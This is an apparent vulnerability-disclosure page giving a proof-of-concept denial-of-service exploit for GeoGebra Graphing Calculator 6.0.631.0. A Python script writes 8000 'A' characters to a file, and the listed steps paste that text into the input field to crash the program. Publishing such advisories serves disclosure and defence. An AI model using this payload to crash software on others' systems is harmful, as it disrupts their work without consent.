GeoGebra Graphing Calculator 6.0.631.0 Denial Of Service

2021.03.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 6.0.631.0-offlinegraphing # Tested on: Windows 8.1 Pro # STEPS # Open the program Graficadora # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the field "Entrada..." # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top